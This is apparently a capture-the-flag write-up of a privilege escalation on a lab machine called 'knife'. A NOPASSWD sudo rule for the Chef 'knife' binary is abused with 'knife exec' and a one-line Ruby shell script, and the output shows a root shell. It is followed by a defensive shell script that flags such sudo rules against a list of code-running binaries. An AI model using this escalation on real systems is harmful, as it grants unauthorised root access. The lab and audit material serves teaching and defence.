3 privesc
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
james@knife:~$ ls -la /usr/bin/knife
lrwxrwxrwx 1 root root 31 May 7 11:03 /usr/bin/knife -> /opt/chef-workstation/bin/knife
Running sudo /usr/bin/knife gives us docs
https://docs.chef.io/workstation/knife/
https://docs.chef.io/workstation/knife_exec/
> knife exec runs a Ruby script, so we can create an .rb file and run it.
james@knife:/opt/chef-workstation/bin$ cd /home/james
james@knife:~$ echo "system('/bin/bash')" > shell.rb
james@knife:~$ chmod +x shell.rb
james@knife:~$ sudo /usr/bin/knife exec shell.rb
root@knife:/home/james# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
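Seen from the defender's side, the finding above is a NOPASSWD sudo rule for a binary that runs user-supplied code (`knife exec`). The script below is an added example, not part of the original notes: it reads `sudo -l` output and flags such rules for review. The `RISKY` list, the function names and the sample rules other than the knife one are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original notes): flag NOPASSWD sudo rules whose
# target binary can run user-supplied code, as /usr/bin/knife does via `knife exec`.
# RISKY is an assumed, illustrative list; only knife comes from this page.
RISKY="knife ruby python python3 perl bash sh"

# Reads `sudo -l` output on stdin, prints one finding per matching NOPASSWD command.
# The body runs in a subshell so the IFS and globbing changes stay local.
audit_sudo_rules() (
    set -f                      # no filename expansion while splitting
    while IFS= read -r line; do
        case "$line" in
            *"NOPASSWD:"*) ;;   # e.g. "(root) NOPASSWD: /usr/bin/knife"
            *) continue ;;
        esac
        runas=${line#*\(}; runas=${runas%%\)*}
        rest=${line#*NOPASSWD: }
        IFS=','                 # one rule line may list several commands
        for entry in $rest; do
            entry=${entry# }
            cmd=${entry%% *}    # drop arguments, keep the binary path
            # Follow symlinks such as /usr/bin/knife -> /opt/chef-workstation/bin/knife
            target=$(readlink -f -- "$cmd" 2>/dev/null) || target=$cmd
            [ -n "$target" ] || target=$cmd
            for name in "${cmd##*/}" "${target##*/}"; do
                case " $RISKY " in
                    *" $name "*)
                        echo "REVIEW runas=$runas cmd=$cmd target=$target"
                        break ;;
                esac
            done
        done
    done
)

# Constructed sample: the rule from this page plus made-up rules for contrast.
sample_sudo_l() {
    cat <<'EOF'
User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) NOPASSWD: /usr/bin/systemctl status nginx, /usr/bin/perl
    (root) /usr/bin/ruby
EOF
}

sample_sudo_l | audit_sudo_rules
```

On a real host, pipe `sudo -l -U <user>` into `audit_sudo_rules`; rules that require a password are deliberately out of scope here.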